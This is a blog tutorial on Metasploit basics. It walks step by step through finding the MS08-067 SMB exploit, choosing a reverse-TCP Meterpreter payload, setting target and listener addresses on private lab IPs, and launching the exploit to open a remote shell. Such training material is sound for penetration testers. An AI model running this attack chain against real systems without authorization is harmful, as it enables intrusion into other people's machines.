MSF Fundamentals 2017 (Part 1 of 3) – Console to Payload

This is quick-hit version of part one of a three part series on Metasploit Fundamentals that I wrote to update my previous work (from 2014) on Metasploit.  If you’re looking for a more hands-on/in-depth version of this article you can access training on this topic here: MSF Fundamentals – Part 1 of 3 (Startup Exploit Payload) (basic_0x02)

The purpose of this article is to get you familiar with starting up the Metasploit Framework (MSF), finding an exploit, finding a matching payload, and configuring everything up until it’s time to launch an exploit.  Part two will cover exploitation and post-exploitation modules, while part three will cover pivoting, lateral movement, and automation.  This training assumes you’re using a 2016 variant of Kali Linux and that it’s patched up to at least August 2016.  If that’s true, then let’s go!

Note: In this article we’ll be setting up a PostgreSQL database as the backend.  It’s not strictly necessary, but does speed up your searches and make several other management features consistent across sessions. Also note that as these are quick hit notes I haven’t included screenshots/outputs. They’re intended for you to follow along with and modify as appropriate for your environment, including the exploit selection itself.

Terminology:

  • RHOST means “remote host” and is the target of the attack
  • LHOST means “local host” and is the system running MSF
  • LPORT means “local port” and is the port to use for incoming connections
  1. Start the database:
    msfdb start
  2. Initialize the database (first time only):
    msfdb init
  3. Update the MSF (alternatively, if you’re keeping Kali updated it will update this for you as well):
    msfupdate
  4. Start the MSF console:
    msfconsole
  5. Find an exploit (in this case, we’ll say we’re looking for the infamous CVE 2008-4250 SMB exploit, better known by the MS patch of MS08-067):
    search smb                                  # Lots of all kinds of results
    search type:exploit smb                     # Lots of exploit results
    search type:exploit platform:windows smb    # Less results
    search cve:2008-4250                        # One result
  6. Select the exploit:
    use exploit/windows/smb/ms08_067_netapi
  7. Review exploit options:
    show options
  8. Configure the exploit options (assuming 10.20.30.100 is the IP address of a system susceptible to this particular exploit):
    set RHOST 10.20.30.100
  9. Find matching payloads for the exploit:
    show payloads
  10. Select the payload:
    set payload windows/meterpreter/reverse_tcp
  11. Review payload options:
    show options
  12. Configure the payload options (assuming 10.20.30.200 is the system that the MSF console is running on):
    set LHOST 10.20.30.200
    set LPORT 12345
  13. Run the exploit:
    exploit

Assuming that you set the RHOST value to a system vulnerable to this exploit (e.g. a Windows Server 2003 instance) you’ve now just opened a reverse TCP Meterpreter shell back to your MSF console, and can move on to part two.  Good hunting!

Comments are closed.

Create a website or blog at WordPress.com

Up ↑

%d bloggers like this: